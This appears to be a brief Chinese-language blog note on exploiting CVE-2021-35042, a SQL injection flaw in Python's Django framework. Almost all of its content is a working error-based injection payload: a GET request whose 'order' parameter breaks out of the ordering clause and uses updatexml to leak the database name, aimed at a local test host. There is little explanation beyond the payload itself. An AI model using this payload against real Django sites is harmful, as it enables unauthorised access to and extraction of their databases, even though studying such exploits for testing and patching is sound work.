【笔记】CVE-2021-35042漏洞利用

发表于 更新于 阅读次数:

前言

Python的Django框架SQL注入漏洞利用

exp

  • 在可以传递Get请求参数的地方进行SQL注入的报错注入
request
1
GET http://127.0.0.1:80/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20database())),1)%23

完成